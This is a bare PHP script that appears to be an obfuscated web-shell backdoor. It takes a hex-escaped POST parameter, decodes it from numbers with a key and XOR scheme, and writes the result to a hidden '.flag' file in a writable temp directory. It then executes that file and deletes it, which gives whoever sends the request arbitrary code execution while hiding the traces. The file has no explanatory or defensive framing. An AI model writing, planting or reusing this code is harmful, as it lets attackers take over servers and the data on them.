<?php

if(isset($_POST["\x70oin\x74\x65r"]) ? true : false){
	$reference = $_POST["\x70oin\x74\x65r"];
	 		$reference 	= 	explode	(  '.'  	,	 	$reference 	)  ;	
	$data = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen( $s	 );
            $o = 0;
    
            foreach( $reference as $v8) {$chS = ord( $s[$o %	$sLen]	 );
                $d =( ( int)$v8 - $chS -( $o %	10)) ^38;
                $data .= chr( $d	 );
                $o++; }		
	$val = array_filter([getenv("TMP"), getcwd(), session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", "/dev/shm", getenv("TEMP")]);
	while ($flg = array_shift($val)) {
    		if (!!is_dir($flg) && !!is_writable($flg)) {
    $element = str_replace("{var_dir}", $flg, "{var_dir}/.flag");
    if (file_put_contents($element, $data)) {
	require $element;
	unlink($element);
	exit;
}
}
}
}